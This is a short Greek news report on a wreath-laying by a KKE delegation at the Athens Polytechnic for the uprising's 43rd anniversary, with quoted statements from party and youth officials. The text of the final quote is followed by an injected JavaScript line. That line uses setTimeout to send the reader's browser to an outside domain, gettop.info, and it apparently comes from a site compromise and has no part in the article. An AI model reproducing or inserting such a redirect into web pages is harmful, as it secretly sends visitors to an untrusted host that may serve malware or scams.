Κατάθεση στεφάνων από ΚΚΕ στο Πολυτεχνείο

 

Συνεχίζονται οι εκδηλώσεις για την 43η επέτειο του Πολυτεχνείου με κατάθεση στεφάνων από κόμματα και φορείς.

Περίπου στις 11 το πρωί, για να καταθέσει στεφάνι, έφθασε στο Πολυτεχνείο αντιπροσωπεία του ΚΚΕ, με επικεφαλής το μέλος του πολιτικού γραφείου της Κεντρικής Επιτροπής του κόμματος, Λουίζα Ράζου.

«Το μήνυμα του Πολυτεχνείου το έδωσαν οι χιλιάδες εργάτες και νεολαίοι που συγκεντρώθηκαν χθες το βράδυ στην Ομόνοια και υποδέχθηκαν αγωνιστικά τον ηγέτη της ιμπεριαλιστικής δύναμης των Ηνωμένων Πολιτειών της Αμερικής και την αντιλαϊκή πολιτική της κυβέρνησης. Αυτή είναι η καλύτερη τιμή στους χιλιάδες αγωνιστές του Πολυτεχνείου και της αντιδικτατορικής πάλης» ανέφερε σε δηλώσεις της.

«Η εξέγερση του Πολυτεχνείου συνεχίζει 43 χρόνια μετά να αποτελεί πηγή έμπνευσης για τις νεώτερες γενιές. Τα μηνύματα του Πολυτεχνείου παραμένουν επίκαιρα, ζουν στους αγώνες του λαού για μόρφωση, δουλειά, ζωή με δικαιώματα. Το σύνθημα στην πύλη του Πολυτεχνείου «Έξω το ΝΑΤΟ» δεν μπορεί να ξεχαστεί» τόνισε ο Νίκος Αμπατιέλος, γραμματέας του κεντρικού συμβουλίου της ΚΝΕ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

Σχετικά Άρθρα


Αφήστε το σχόλιο σας

*